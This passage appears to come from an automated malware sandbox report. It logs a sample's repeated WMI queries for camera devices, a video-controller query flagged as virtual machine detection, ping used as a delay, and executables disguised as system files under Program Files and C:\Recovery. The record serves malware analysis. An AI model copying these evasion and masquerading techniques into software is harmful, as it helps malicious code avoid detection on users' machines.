                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Uses ping.exe to sleep
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeMemory allocated: C30000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeMemory allocated: 1A7A0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeMemory allocated: 32F0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeMemory allocated: 1B2F0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeMemory allocated: 13E0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeMemory allocated: 1AFA0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeMemory allocated: 1030000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeMemory allocated: 1AC90000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeMemory allocated: 1760000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeMemory allocated: 1B150000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeMemory allocated: 3120000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeMemory allocated: 1B3F0000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeMemory allocated: C50000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeMemory allocated: 1A790000 memory reserve | memory write watch
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeMemory allocated: 1130000 memory reserve | memory write watch
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeMemory allocated: 1B150000 memory reserve | memory write watch
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeMemory allocated: 1780000 memory reserve | memory write watch
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeMemory allocated: 1B570000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeMemory allocated: 26D0000 memory reserve | memory write watch
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeMemory allocated: 1A900000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeMemory allocated: 11D0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeMemory allocated: 1B0A0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeMemory allocated: 1770000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeMemory allocated: 2E50000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeMemory allocated: 1AF00000 memory reserve | memory write watch
